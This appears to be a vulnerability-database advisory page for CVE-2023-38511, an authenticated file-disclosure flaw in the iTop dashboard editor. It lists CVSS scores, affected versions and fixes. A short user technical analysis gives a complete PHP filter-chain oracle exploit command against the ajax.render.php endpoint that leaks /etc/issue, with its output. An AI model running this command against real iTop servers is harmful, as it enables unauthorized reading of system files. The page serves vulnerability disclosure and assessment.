Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
Low
Attack Vector
Network
1

CVE-2023-38511

Disclosure Date: April 15, 2024
CVE-2023-38511 CVSS v3 Base Score: 4.3
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

iTop is an IT service management platform. Dashboard editor : can load multiple files and URL, and full path disclosure on dashboard config file. This vulnerability is fixed in 3.0.4 and 3.1.1.

Add Assessment

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
Common in enterpriseEasy to weaponizeVulnerable in default configurationAuthenticated
Technical Analysis

php_filter_chains_oracle_exploit makes it easy to wayponize.

$ python3 filters_chain_oracle_exploit.py --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
b'RGViaWFuIEdOVS9MaW51eCAxMSBcbiBcbAoK'
Debian GNU/Linux 11 \n \l
Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
4.3 Medium
Impact Score:
1.4
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
Low
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
Low
Integrity (I):
None
Availability (A):
None

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
iTop >= 3.0.0, < 3.0.4
iTop >= 3.1.0, < 3.1.1
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

Products

Technical Analysis